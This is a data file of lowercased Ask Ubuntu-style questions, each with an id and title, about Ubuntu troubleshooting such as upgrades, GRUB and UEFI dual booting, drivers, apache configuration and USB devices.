484978	newer distributions versus lts version	i sometimes use the reposistory of a newer distribution to get very actual versions of programs e.g . the mediathek ; the newest is published in the utopic distribution . the advantage is , that i automatically get always the newest developed files . when i upgrade my packages i also get all the files for the newest ubuntu version - but i want to keep my stable lts version . what would you recommend to do ?
484982	what is the difference between standard syntax and bsd syntax ?	i have seen many commands that accept a `` bsd syntax '' as well as their standard syntax . take the ps command for one example : to see every process on the system using standard syntax : ps -e ps -ef ps -ef ps -ely to see every process on the system using bsd syntax : ps ax ps axu so what is the difference between these two routes ? in general when they say in bsd syntax what elements i should remember ? is this syntax just for those commands which they are in the bsd also ?
484985	ca n't find library after updating ubuntu [ ogre ]	i 'm working with ogre for a personnal project . yesterday i have updated ubuntu to the last version with `` do-release-upgrade '' the problem is that i was working with ogre on a project , since i have done the update , i have the following message ( after successful compilation ) . [ error ] in function loader object constructor : libboost_thread.so.1.49.0 : can not open shared object file : no such file or directory . my current version of libboost is 1.54 , before i had 1.53 and 1.49 ( both ) do i have to recompile ogre ? or do i have to reinstall an older version of libbboost ? ( i have tried this , but ca n't find how to figure it out ) [ update ] : if i cp 'libboost_thread.so.1.54.0 ' into 'libboost_thread.so.1.49.0' it launch my programm but sigsegv . so could i find the libboost_thread.so.1.49.0 thanks a lot .
484986	how do i make apache serve a single static page no matter what the entered url is ?	i 'm making an advertisement blocking dns server that redirects all the advertisement domains to an instance of apache . so something like www.addomain.com gets redirected to dnsserver.localnetwork however , occasionally i come across links more like www.addomain.com/some_ad which gets redirected to dnsserver.localnetwork/some_ad which does n't even exist and hence raises a 404 error . i was hoping that there would be some way to make apache serve index.html , regardless of the actual request . otherwise , if you have an alternate solution that does not involve apache , i 'm up for that too .
484989	panel icons disappear at startup	icons sometimes disappear from the panel notification area when ubuntu 14.04 starts up . not the same icon disappears every time , and only one icon disappears at a time . this happens infrequently , and i have also seen it happen on older versions of ubuntu . the next time i start up ubuntu , all of the panel icons are back in the notification area of the panel where they should be . here are some examples of icons that have disappeared from the panel notification area at startup . battery indicator network indicator thunderbird mail sound clock gear icon for accessing functions such as lock/log out/suspend/restart/shut down , etc . from a popup menu all of these icons have disappeared from the panel at least once , however the indicator icon for psensor temperature monitor application which usually takes about one minute after startup to appear on the panel notification area has never disappeared from the panel at startup . how can i make a missing panel icon reappear without rebooting the operating system ? i would prefer a general solution that works for any of the missing icons in the list .
484991	permanent email/chat indicator till click	i use gm-notify and empathy in ubuntu 14.04 . when these applications generate a notification , the email indicator , which is an envelope icon , turns to blue for a short time and then it returns its normal state , which is black in color . i want the icon to remain blue until i click the notification of the application .
484993	run command on another ( new ) terminal window	how to run any command in another terminal window ? example : i opened one terminal window and if i run command like apropos editor , then it run and out-puts on that window . but i want to run same command on another terminal window ( new window ) instead on present window from first terminal . further clarification : i need suggest-command < command > that open new terminal window and run mentioned < command > in that ( newly opened ) window . ( where suggest-command is example of suggestion of command . ) how to do that ?
484995	copy folders/files with permission denied error.. even with sudo nautilus	i am trying to graphically copy folders from ext4 partition to another ntfs one using nautilus on gnome , ubuntu 12.04 with gnome-fall-back . i get permission denied errors for some of the files while copying . i used sudo nautilus to make the graphical copy going , but got same errors . now , what options do i have to copy all folders and files ( huge number ) ? thank you so much !
484999	ca n't install openjdk 1.6 in ubuntu	accidentally i removed openjdk from ubuntu . now it is not possible to install it again.it gives error that : err http : //in.archive.ubuntu.com/ubuntu/ precise-updates/main tzdata all 2014c-0ubuntu0.12.04 404 not found [ ip : 91.189.92.200 80 ] i used to try sudo apt-get update also . finally it gives : warning : the following packages can not be authenticated ! openjdk-6-jre-lib ca-certificates-java tzdata tzdata-java openjdk-6-jre-headless libgif4 openjdk-6-jre libatk-wrapper-java libatk-wrapper-java-jni libxt-dev ttf-dejavu-extra icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-netx-common icedtea-netx openjdk-6-jdk install these packages without verification [ y/n ] ? y err http : //in.archive.ubuntu.com/ubuntu/ precise-updates/main tzdata all 2014c-0ubuntu0.12.04 404 not found [ ip : 91.189.91.14 80 ] err http : //in.archive.ubuntu.com/ubuntu/ precise-updates/main tzdata-java all 2014c-0ubuntu0.12.04 404 not found [ ip : 91.189.91.14 80 ] get:1 http : //in.archive.ubuntu.com/ubuntu/ precise-updates/main libxt-dev amd64 1:1.1.1-2ubuntu0.1 [ 490 kb ] get:2 http : //in.archive.ubuntu.com/ubuntu/ precise-updates/main openjdk-6-jdk amd64 6b31-1.13.3-1ubuntu1~0.12.04.2 [ 16.0 mb ] fetched 16.5 mb in 59s ( 278 kb/s ) failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/t/tzdata/tzdata_2014c-0ubuntu0.12.04_all.deb 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/t/tzdata/tzdata-java_2014c-0ubuntu0.12.04_all.deb 404 not found [ ip : 91.189.91.14 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
485003	most of my software just disappeared ( kubuntu )	amarok , konsole , dolphin , volume control , and a lot of other software just disappeared after i restored pam.d to default last night . is there some way for me to restore my software without restoring the pam.d file configs ? should i just backup /home/ and do a reinstall ?
485008	ubuntu 14.04 install : grub-efi-amd64-signed failed to install into /target/	i 'm trying to install ubuntu 14.04 on a dell inspiron 7537 , in dual-boot with windows 8.1 , with a uefi system . after the creation of the new partitions , i 've been able to install ubuntu 14.04 without any problem . it booted regularly , as far as i launched windows again . probably some program ( mcafee ? ) has modified my efi partition , and since that moment i 've not been able to launch the `` ubuntu '' entry of uefi anymore . grub failed to load , and the pc lauched the second option of uefi , i.e . windows 8.1 . of course , i 've tried to make a new installation of ubuntu , but now i get this error when ubiquity tries to configure grub2 : grub-efi-amd64-signed failed to install into /target/ . without grub boot loader , the installed system will not boot and then ubiquity crashes . at this point i tried to clean up the efi settings using both efibootmgr on ubuntu liveusb and easyuefi on windows . these tools remove the entry correctly , but the problem remains unsolved . also boot-repair seems to fail , as when it asks me to launch sudo chroot `` /mnt/boot-sav/sda7 '' dpkg -- configure -a i get the same error : setting up grub-efi-amd64-signed ( 1.34+2.02~beta2-9 ) ... installing for x86_64-efi platform . grub-install : error : can not open `/boot/efi/efi/ubuntu/shimx64.efi ' : read-only file system . dpkg : error processing package grub-efi-amd64-signed ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : grub-efi-amd64-signed i tried also to restore the laptop to factory settings , but fruitlessly . it is very strange , as the first time everything worked perfectly . what can be my problem ? is there any way to delete all the references to ubuntu from the efi partition ? thank you very much .
485009	if i upgrade ubuntu am i in danger of messing up xp installed on the same pc ?	worked fine last week . firefox now greys out and i ca n't click on any menu items . have been applying updates as they appear but have just learnt elsewhere on this site that that 's a waste of time and i should upgrade to latest ubuntu version . i 'm running ubuntu and windows xp on same pc ( mozilla is ok in windows ) . if i upgrade ubuntu am i in danger of messing up xp ? thanks in advance .
485010	upgrade 13.04 to 14.04 in dual os scenario	i have dual os ubuntu 13.04 alongside windows 8 and i have ubuntu grub . i want to upgrade ubuntu 13.04 to 14.04 without re-installing ubuntu through usb and i dont want to disturb the current scenario in my machine ( i mean not to screw up the grub ) . i am using asus k series laptop . i want to do this as 13.04 is really slow .can someone please guide me through the steps for the upgrade . is ubuntu 14.04 fast .
485016	14.04 lts netboot error	! [ pxe netboot failure with custom repo and kickstart ] [ 1 ] i have the same issue . it works fine with 12.04 , but fails with the same config on 14.04 . is this a bug ? i have an image of the output but cant post it without at least 10 reputation points . same issue as here ; ubuntu 14.04 ( trusty tahr ) pxe netboot gives live-installer error thanks .
485018	no audio output in ubuntu 12.04.4 lts	i have ubuntu 12.04 lts and my aufio output suddenly stopped ! i have an hp probook and the audio output from the internel speakers stopped but if there are external put ispeaker then the output is perfectly fine . is there a problem with my laptop or is this a ubuntu problem ?
485022	software center not opening -- keyerror : 'countrycode '	after some kde-librieries updates ( from official repos ) i 'm unable to open the software center . here 's the terminal output : francesco @ francesco-hp-workstation : ~ $ software-center 2014-06-18 14:53:54,382 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 130 , in < module > app = softwarecenterappgtk3 ( options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 397 , in __init__ self.icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/installedpane.py '' , line 95 , in __init__ categoriesparser.__init__ ( self , db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 251 , in __init__ self._build_string_template_dict ( ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 303 , in _build_string_template_dict region = `` % s '' % get_region_cached ( ) [ `` countrycode '' ] keyerror : 'countrycode' and the log generated : 2014-06-18 14:53:54,382 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' any ideas ? thanks ,
485025	how can i open cairo dock settings window from terminal ?	while i was tring to customize cairo dock from its settings window , i picked up panel mode then applied it , it minimized itself on the bottom of the screen , to such extent that impossible to click it . how can i open cairo dock settings window from terminal to revert setting ?
485027	$ display environment variable changes upon ( almost ) every reboot	i am facing a very strange problem . i have a one display connected to my pc . however the $ display variable changes almost every time i reboot . for now it is :0.0 , but before reboot it was :1.0 . there was also one case when it 's value was :2.0 why is that happening and how can i prevent it ?
485028	how to use -exec option in find command	i wan na solve some problems in compiz with my brain and hands . by the way i entered following command to build compiz from source in ubuntu 12.04 find /opt/compiz-built/share/gconf/schemas -exec gconftool-2 -- install-schema-file= { } ; i referred that command at http : //www.brazzi64.net/blog/building-compiz-from-source-in-ubuntu-12-04/ and following message is shown . how to use -exec option in find command , i guess that it 's my mistake .
485029	usb flash drive not working on ubuntu 14.04	i recently upgraded to ubuntu 14.04 and now my flash drive do n't even blink when plugged in ! i tested the flash drive on windows pc and it works fin . tester the usb port on same pc on linux mint ( dual boot ) it works fin . lsblk command shows : name maj : min rm size ro type mountpoint sda 8:0 0 465.8g 0 disk ├─sda1 8:1 0 1k 0 part ├─sda4 8:4 0 147.5g 0 part ├─sda5 8:5 0 976m 0 part [ swap ] ├─sda6 8:6 0 158.7g 0 part / └─sda7 8:7 0 158.7g 0 part /home sr0 11:0 1 1024m 0 rom when disconnecting and reconnecting the usb flash drive dmesg command shows : [ 132068.186064 ] usb 3-1 : usb disconnect , device number 21 [ 132070.613840 ] usb 3-1 : new high-speed usb device number 22 using xhci_hcd [ 132070.634747 ] usb 3-1 : new usb device found , idvendor=0718 , idproduct=063d [ 132070.634759 ] usb 3-1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 132070.634766 ] usb 3-1 : product : nano pro [ 132070.634771 ] usb 3-1 : manufacturer : imation [ 132070.634776 ] usb 3-1 : serialnumber : 07b20c039f1207bb [ 132070.635151 ] xhci_hcd 0000:00:14.0 : not enough bandwidth . proposed : 2032098 , max : 1607 [ 132070.635164 ] xhci_hcd 0000:00:14.0 : not enough bandwidth [ 132070.635180 ] usb 3-1 : ca n't set config # 1 , error -12 tail /var/log/syslog before usb plugin : jun 26 11:33:41 waqleh-inspiron-3521 networkmanager [ 1138 ] : message repeated 6 times : [ < warn > nl_recvmsgs ( ) error : ( -33 ) dump inconsistency detected , interrupted ] jun 26 11:35:09 waqleh-inspiron-3521 networkmanager [ 1138 ] : < info > ( eth1 ) : device state change : unavailable - > unmanaged ( reason 'removed ' ) [ 20 10 36 ] jun 26 11:35:09 waqleh-inspiron-3521 networkmanager [ 1138 ] : < info > ( eth1 ) : cleaning up ... jun 26 11:35:09 waqleh-inspiron-3521 networkmanager [ 1138 ] : < warn > ( 5 ) failed to find interface name for index jun 26 11:35:09 waqleh-inspiron-3521 networkmanager [ 1138 ] : ( nm-system.c:766 ) : nm_system_iface_get_flags : runtime check failed : ( iface ! = null ) jun 26 11:35:09 waqleh-inspiron-3521 networkmanager [ 1138 ] : < error > [ 1403771709.565624 ] [ nm-system.c:768 ] nm_system_iface_get_flags ( ) : ( unknown ) : failed to get interface link object jun 26 11:35:09 waqleh-inspiron-3521 kernel : [ 80331.126126 ] ipheth 3-1:4.2 : apple iphone usb ethernet now disconnected jun 26 11:35:09 waqleh-inspiron-3521 avahi-daemon [ 964 ] : withdrawing workstation service for eth1 . jun 26 11:35:09 waqleh-inspiron-3521 networkmanager [ 1138 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/pci0000:00/0000:00:14.0/usb3/3-1/3-1:4.2/net/eth1 , iface : eth1 ) jun 26 11:35:10 waqleh-inspiron-3521 kernel : [ 80332.034212 ] usb 3-2 : usb disconnect , device number 5 tail /var/log/syslog after usb plugin : waqleh @ waqleh-inspiron-3521 : / $ tail /var/log/syslog jun 26 11:35:09 waqleh-inspiron-3521 networkmanager [ 1138 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/pci0000:00/0000:00:14.0/usb3/3-1/3-1:4.2/net/eth1 , iface : eth1 ) jun 26 11:35:10 waqleh-inspiron-3521 kernel : [ 80332.034212 ] usb 3-2 : usb disconnect , device number 5 jun 26 11:35:38 waqleh-inspiron-3521 kernel : [ 80359.920678 ] usb 3-4 : new high-speed usb device number 7 using xhci_hcd jun 26 11:35:38 waqleh-inspiron-3521 kernel : [ 80359.941686 ] usb 3-4 : new usb device found , idvendor=0718 , idproduct=063d jun 26 11:35:38 waqleh-inspiron-3521 kernel : [ 80359.941698 ] usb 3-4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 jun 26 11:35:38 waqleh-inspiron-3521 kernel : [ 80359.941704 ] usb 3-4 : product : nano pro jun 26 11:35:38 waqleh-inspiron-3521 kernel : [ 80359.941709 ] usb 3-4 : manufacturer : imation jun 26 11:35:38 waqleh-inspiron-3521 kernel : [ 80359.941714 ] usb 3-4 : serialnumber : 07b20c039f1207bb jun 26 11:35:38 waqleh-inspiron-3521 mtp-probe : checking bus 3 , device 7 : `` /sys/devices/pci0000:00/0000:00:14.0/usb3/3-4 '' jun 26 11:35:38 waqleh-inspiron-3521 mtp-probe : bus : 3 , device : 7 was not an mtp device i have a dell - inspiron 15-3521 uname -a command shows : linux waqleh-inspiron-3521 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:02:19 utc 2014 i686 i686 i686 gnu/linux i even updated the bios to latest sudo dmidecode -s bios-version : a12
485030	overheating when using ubuntu14.04	i installed ubuntu 14.04 in my asus intel i5 laptop . the laptop is heating up to a high temperature quickly which i never seen when using the windows . can anybody give a solution ?
485033	how to open .cdw file ?	i 've got .cdw files . how i can view and print these files ? i found this programm http : //www.solvusoft.com/en/file-extensions/file-extension-cdw , but it is only for windows . update : these files have been created with http : //ascon.net/solutions/kompas_3d/
485034	how to solve the problem of high cpu load ?	after installing macubuntu pack processor became heavily loaded , i replaced ubuntu 64-bit with xubuntu 64-bit , but the processor is still heavily loaded when performing simple actions ( open file manager , install soft ) . it loaded almost 100 or 100 percent . i have also windows on it , and there is too such problem . 2gb ram , processor amd dual-core c60
485036	installing a package that asks debconf questions does n't work with the software-center	i am building an automatic configure package for our environment and it has to ask a few debconf questions when installing . until ubuntu 13.10 it was no problem installing it via the gui but since 14.04 the software-center just hangs when installing . after installing libgtk2-perl separately this is no longer a problem and the questions are getting asked . is this a bug in the software-center or how am i supposed to handle it ? my current workaround is a pre-depends on libgtk2-perl but this should n't be the final solution and sucks for people installing it via terminal .
485037	set file permissions	i have a directory , where users can drop their plugins ( for a game ) . the directory permissions work for adding these plugin files . but there is one problem : when the plugin generates config files , these files are not owned by the user who uploaded it , so the user who uploaded the plugin can not remove or edit these config files . can i make a standard owner ? i would like to arrange it so that when these files are generated , they are owned by the `` www-data '' user . is this possible ?
485038	grub rescue , blind mode	i updated osx last night and when i try to boot to linux , i get sent to the grub rescue prompt . i have performed the following steps : set prefix= ( hd1 , gpt5 ) /boot/grub ( contains grub.cfg but mod files in subdir x86_64-efi ) set root= ( hd1 , gpt5 ) insmod linux linux /vmlinuz root=/dev/sdb5 ro # example : root=/dev/sda1 , /dev/sdb5 initrd /initrd.img boot the result is : error : no suitable video mode found . booting in blind mode and then it stays there forever . the system does not reboot or restart . is this because it can not find my mod files ?
485040	ubuntu upgrade path from 13.04 to 14.04	i have an ubuntu 13.04 laptop , which is 32-bit . i know there is no possible way for direct upgrade to ubuntu 14.04 . but how can i upgrade step by step , could you tell me how ? also in addition i tried many ways of upgrading , which includes downloading ubuntu 14.04 .iso file form the ubuntu website .
485042	ubuntu 14.04 no wirless and wired connection , shutdown issue , installation repair	i am new to ubuntu i installed ubuntu 14.04 i have several problems which i can not fix . i have run numerous commands to fix the issues . i have lost my wired ethernet connection . i can not connect to my wireless . i am being denied to run certain commands . i have lost my connection with my cd rom . my laptop will now not shut down without holding down the power key.. i am using a hp dv6700 laptop . i do have an internet connection which works through an external usb wirless device . i also have a desktop running ubuntu 10.04 which i can also use if needed . please help
485045	where can i find the source code for mounting my digital camera ?	i have some simple digital camera for my kids with only internal memory . i do have some windows software for it to import the photos . the windows software looks a bit outdated , but it works . when i connected it on an ubuntu machine to read the usb id ( id 0979:0227 jeilin technology corp. , ltd jl2005b/c/d toy camera ) it worked instantly . the memory was mounted as a drive , i could see the photos and copy them ! but when i go on holiday i will have neither a windows pc nor an ubuntu machine nearby . i will only have my android tablet , which supports usb on-the-go . when i connect the camera via the usb otg connector , the camera gives a bleep and on my tablet i see a message `` usb connector attached '' . but i do n't see a mounted drive ( which i do see when i connect a simple usb memory stick to my tablet ) . if there is n't any app to mount and read the photos , then maybe i have to write my own . does somebody know where i can find the ubuntu sources for mounting my digital camera , so i could use this to create an android app ?
485048	silex in ubuntu 14.04	i 'm working off a fresh ubuntu 14.04 install . i installed a lamp stack appropriately and it all seemed to be working . i 'm trying to learn how to use silex , the php framework . so i followed the instructions and downloaded / extracted it into `` /var/www/ '' . silex wants me to create a folder called `` web '' under this , but as apache on ubuntu serves files from `` /var/www/html '' . so my current directory strucure under `` var/www/ '' is `` html '' ( where index.php and the .htaccess file reside ) , `` vendor '' ( included by silex ) as well as composer files . i 've already run a2enmod to enable mod_rewrite and restarted apache a few times . so the problem : like i said i 've followed the hello world tutorial on the silex site . when i hit `` localhost '' i get a grey page with the `` sorry ... '' message which i believe is from silex . i 'm supposed to be able to go to `` localhost/hello/world '' to get a hello world message but at this point i just get the standard apache does not exist message . any tips on getting silex up and running ? anything glaringly obvious i 've missed ( i am very much a newbie at serious php development )
485050	how to add a usb hdd to a virtual machine created using vmware player ?	i have a 2 virtual machines running on virtual machine manager & vm player 6 , on ubuntu server 12.04 lts . i have connected 2 usb hdd drives which have been detected by ubuntu ( host ) but neither is showing in either of the virtual machines . in vmware i try to connect it to the virtual machine by disconnecting it from the host but i get an error saying that it 's in use but after few minutes it disconnects it from host and on virtual machine ( guest - windows 2008r2 ) i get a pop up saying successfully connected but it does not show in my computer . any help is appreciated .
485052	trying to test a service is up using nc command	i 'm trying to test if a service is up and running using nc . echo ruok | nc 127.0.0.1 5111 but i get this response : this is nc from the netcat-openbsd package . an alternative nc is available in the netcat-traditional package . usage : nc [ -46ddhklnrstuuvzc ] [ -i interval ] [ -p proxy_username ] [ -p source_port ] [ -s source_ip_address ] [ -t tos ] [ -w timeout ] [ -x proxy_protocol ] [ -x proxy_address [ : port ] ] [ hostname ] [ port [ s ] ] i 'm not sure how to use this 'alternative nc ' , can someone please explain this to me ? i tried : echo ruok | nc -s 127.0.0.1 -p 5111 but i got the same message .
485054	autocomplete filename in script	i have been searching for a solution to this problem for a while . i am trying to find a way to use autocomplete for more than just commands , eg : for files inside the current folder . one possible use case ( but not the only one ) : copy file 1.txt into a directory inside the current one called i* ( i know there 's only one ) . command line , it would be : cp 1.txt i [ tab ] is there any way i can do this in a script ?
485056	ubuntu 14.04 - after installation no bootloader , so windows 7 starts	i have just installed ubuntu 14.04 for the first time . there is also working windows 7 on that pc . after the installation from ubuntu 14.04 with an usb-stick i clicked on `` restart '' and the system told me to unplug the usb-stick . ok done . but then the system started with windows 7 and i had no choice nor chance to change the os i wanted to start . so my pc has no uefi just an old bios and in the ubuntu wiki i ca n't find a way to change the windows bootloader . so what can i do to start ubuntu ? ? ? : - (
485057	dual boot ubuntu 12 and windows 7 pro on two separate 3t hdd on uefi + bios mode	i have tried every solutions that have been posted by the `` ask ubuntu '' site , and everyone of them is different - not necessarily different situation - in tackling my case . the answers are not organized and rather inconsistent . if you want to attract linux users or help your community , then proper communication is important and keep in mind that not everyone has full knowledge and there are new members . assuming everyone knows what you 're talking about is wrong . so after weeks of wasting my time , i decided to join and share my problem : my computer : dell optiplex 9010 uefi & legacy ( core i7 ) 2 gpt converted hds what i 've done : installed win7 first and then ubuntu ( with necessary partitions : / , boot , home , efi , swap , etc . ) tried bootloader on both sda ( windows ) and sdb ( linux ) : did n't work on few occasions windows starts loading , but not linux and on few occasion linux booted and worked but not window then : tried to install the windows while the second hd ( for linux ) was disconnected from the board but same issue , windows would boot , but not linux tried to install the linux while the second hd ( for windows ) was disconnected from the board , but same problem tried easybcd program from neosmart to set the bootloader when window was running , but then i got the error saying `` there is no system boot , press f1 to retry , f2 for bios setup or f5 ... .. '' so what is really a proper steps to implement this ? any help is greatly appreciated !
485058	usb onda mt835up on ubuntu 12.04 lts	i have a usb 3g modem , model onda mt835up , which i was able to use with my live usb ubuntu 12.04 by means of tim sw , the sw provided with the usb key by the telecom provider ( `` chiavetta_internet_mt835up '' ) . i do n't know what happened in the meantime , but now i can not use it anymore , when i try to connect i read among the other messages , from terminal where i launch the app from , the message : > -- > wvdial : internet dialer version 1.61 > -- > can not open /dev/ttyacm0 : device or resource busy > -- > can not open /dev/ttyacm0 : device or resource busy > -- > can not open /dev/ttyacm0 : device or resource busy i 've tried thousands of possible solutions found on different threads but nothing worked till now and i do n't know where to go now ... the strange thing is that everything seems to work perfectly , in the provider sw i can see the umts signal is detected , good signal level , the sim is ok , the configuration of the sw is the same as when it was working . the sim is registered on the network but when i press `` connect '' the connection attempt fails ( `` connection failed ! '' error message ) . i suspect the real problem is with this ttyacm0 resource which is seen as busy . anyway with fuser /dev/ttyacm0 the only process using it is the process which is used to connect ... edit : i forgot to add a very important info which could help to find the right solution . i noticed from the dmesg output some important lines > [ 12811.652037 ] usb 2-3 : new high-speed usb device number 13 using ehci-pci > [ 12811.784940 ] usb 2-3 : new usb device found , idvendor=1ee8 , idproduct=0013 > [ 12811.784948 ] usb 2-3 : new usb device strings : mfr=2 , product=1 , serialnumber=3 > [ 12811.784953 ] usb 2-3 : product : mt835up > [ 12811.784958 ] usb 2-3 : manufacturer : onda > [ 12811.784963 ] usb 2-3 : serialnumber : 0.0.2 > [ 12811.785394 ] usb-storage 2-3:1.0 : usb mass storage device detected > [ 12811.785557 ] scsi13 : usb-storage 2-3:1.0 > [ 12812.784731 ] scsi 13:0:0:0 : cd-rom onda datacard cd-rom 0001 pq : 0 ansi : 0 > [ 12812.785215 ] scsi 13:0:0:1 : direct-access onda storage 0001 pq : 0 ansi : 0 > [ 12812.787191 ] sr0 : scsi3-mmc drive : 0x/0x caddy > [ 12812.787404 ] sr 13:0:0:0 : attached scsi cd-rom sr0 > [ 12812.787517 ] sr 13:0:0:0 : attached scsi generic sg2 type 5 > [ 12812.789537 ] sd 13:0:0:1 : attached scsi generic sg3 type 0 > [ 12812.792208 ] sd 13:0:0:1 : [ sdc ] attached scsi removable disk > [ 12812.869099 ] sr0 : cdrom ( ioctl ) error , command : xpwrite , read disk info 51 00 00 00 00 00 00 00 02 00 > [ 12812.869123 ] sr : sense key : hardware error [ current ] > [ 12812.869129 ] sr : add . sense : no additional sense information > [ 12813.125078 ] sr0 : cdrom ( ioctl ) error , command : xpwrite , read disk info 51 00 00 00 00 00 00 00 02 00 > [ 12813.125093 ] sr : sense key : hardware error [ current ] > [ 12813.125097 ] sr : add . sense : no additional sense information > [ 12813.129709 ] usb 2-3 : usb disconnect , device number 13 is there an error of the filesystem of the usb stick ( actually it works in zerocd : first time is connected to a pc is seen as a hard drive to install the driver and provider sw , from the second time it should be seen as a modem . what 's wrong with it ?
485064	remove `` chrome apps '' from xubuntu menu	earlier today i installed google chrome only to realize that i needed to uninstall it for reasons i wo n't get into here , so i removed google chrome and got mozilla firefox back . before i uninstalled google chrome , i downloaded an app from the chrome web store that runs in its own window ( not in google chrome ) that added chrome apps into my xubuntu menu so i can access it . i restarted my computer after the uninstallation , but the chrome apps submenu is still in my xfce menu ! i thought this was a problem with a file google chrome left behind , so i reinstalled google chrome just so i could type sudo apt-get purge google-chrome-stable , which should have deleted some of its files , but that did n't help at all but google chrome was still removed from my system like i wanted , including the chrome app i downloaded . the links in the chrome apps menu are broken ( like they should be because google chrome and the chrome apps were removed ) , but the folder is still there . how do i remove the chrome apps menu ( or submenu or folder or whatever you call it ) from the xfce menu ? below is a screenshot of this problem .
485065	run task manager in xubuntu as superuser	i am trying to change the priority of a process in my system via xubuntu 's task manager by typing sudo taskmgr , but taskmgr is n't the name of the executable . what is the name of the executable program and if i change the priority of a process and restart my computer , will the process have the same priority ?
485068	how to connect to ms exchange server 2010 from evolution with a multiuser account	i have latest evolution client , which works well with my private mail and is running through ms exchange 2010 . i have configured it via exchange web services . i can receive and send without problems . but i have another email address to check daily , what is also used by another 4 people . this address has the same ms exchange server , same domain , just another beginning . and i can not get working in evolution . any ideas what iâm missing ?
485070	boot up/grub menu	okay so , recently , after a recommendation from a friend i decided to dual boot ubuntu 14.04 with windows 8 . everything went right during the process ( partitioning , installing , etc ) but upon rebooting my laptop ( by the way my laptop is an hp pavillion g6 ) it boot straight into windows 8 with no grub menu to be seen . i atempted to use boot repair on ubuntu and that failed , i also tried to change the boot order in the bios although i 'm not really sure what i 'm doing there so i do n't know if i did it right or not . some help would be brilliant as i 'm not sure how to go about getting the grub menu back ! thanks : d
485072	adobe flashplugin-installer keeps sending error message at startup ( kde daemon on kubuntu 14.04 )	i have the adobe flashplugin installed ( grmmmbl ... ) but kde daemon keep sending this error message at session startup : saying it can not find the flashplugin installer while i do not want it ( and after attempt to purge by hand , i had the `` not installed '' message ... as i have this each time i log in , i would like to know how to disable this message ( i could n't find where it comes from searching the logs )
485075	how to make gnome look like windows 7	i was wondering that how can i make gnome look like windows 7/8 . i have the icons and themes but is there a task bar available to make it look completely like windows 7 ?
485080	unable to start apache2 after reinstall	i had an issue with my original install of apache2.4 on ubuntu14 . i have removed and purged the files in /etc/apache2 and reinstalled apache . now i am unable to start the server . can you please let me know if you have seen this issue before ? apache2 : syntax error on line 140 of /etc/apache2/apache2.conf : syntax error on line 2 of /etc/apache2/mods-enabled/access_compat.load : can not load /usr/lib/apache2/modules/mod_access_compat.so into server : /usr/lib/apache2/modules/mod_access_compat.so : can not open shared object file : no such file or directory action 'configtest ' failed .
485081	when i sign in , it just stays on the wallpaper with no sidebar or topbar	i recently installed 14.04 , and it installed just fine , and it showed the log in screen and i log in and then it just show the log in wallpaper .
485085	problems with fglrx driver on amd radeon 8000m series on trusty	i have tried installing proprietary drivers from the `` software & updates dialog '' and also from ati 's latest driver page . the problem i am facing is that the binaries are n't in the path , and trying to run them with the full path gives me the following error . atoulan @ atoulan-laptop : ~ $ sudo /usr/lib/fglrx/bin/aticonfig unable to open /etc/ati/control , please reinstall the driver . /usr/lib/fglrx/bin/aticonfig : no supported adapters detected here is the output from lspci : atoulan @ atoulan-laptop : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] mars [ radeon hd 8670a/8670m/8750m ] ( rev ff ) and uname : atoulan @ atoulan-laptop : ~ $ uname -a linux atoulan-laptop 3.13.0-29-lowlatency # 53-ubuntu smp preempt wed jun 4 21:27:51 utc 2014 x86_64 x86_64 x86_64 gnu/linux according to amd 's page my card should be supported by this driver . of course every time i try out a new driver i purge the old ones . can anyone tell me how to install this driver properly ? thanks .
485090	shrink or remove swap with 4gb ram and ssd ?	i was n't exactly sure so i created a swap partition 4100mb in size . now i have swappiness at 0 and it 's highly unlikely i 'll ever need swap because i do n't use any memory intensive apps . i also do n't hibernate . my ssd is large enough at 256gb but not huge with half of it used by win 8.1 . should i shrink swap and if yes to what size or should i get rid of it altogether .
485094	`` can not resolve proxy hostname `` when installing an application	i am using 2 screens on my computer and wanted to enable the brightness control on the second monitor . i found an application called `` brightness controller '' on the software centre but the link provided does n't work . it is for sale at 0 $ and when i click on the buy button , i get an error message . unable to load page problem occurred while loading the url https : //software-center.ubuntu.com/subscriptions/en/ubuntu/precise/+new/ ? archive_id=commercial-ppa-uploaders % 2fbrightness-controller & arch=i386 can not resolve proxy hostname i went to the application page , but once there , being a win xp defector , i do not know what to do with the multiple links provided there .
485099	how can i hide the grub menu when the systems boots ?	how can i hide the grub2 menu when a ubuntu system boots ?
485100	how may i burn srt subtitles to video with avconv ?	system : xubuntu 13.04 x64 i 've found usage of this functionality in ffmpeg here ffmpeg -i video.avi -vf subtitles=subtitle.srt out.avi but it does n't work . i get an error no such filter : 'subtitles' on that . same thing happens if i replace ffmpeg by avconv . so i tried downloading the libav source here and compile . again i 'm frustrated when i run ./configure -- enable-libass in the source directory , and this time i got unknown option `` -- enable-libass '' i wonder if this is a very particular thing that avconv does n't support at all . and
485102	d-link dwa-182 drivers for linux	when will ubuntu have these drivers available for download ? seems the drivers for dwa-182 were released on 06/17/2014 . they are for linux ! seems that i just do n't know how to install them . i have them download & extract but i ca n't get them to install . i need help badly . anyone with the time to take me step by step , would be greatly appreciated ! this is the boss ( wife ) computer . once again help would be greatly appreciated ! i am not that good with ubuntu yet as i just start using it & zorin too ! thank you !
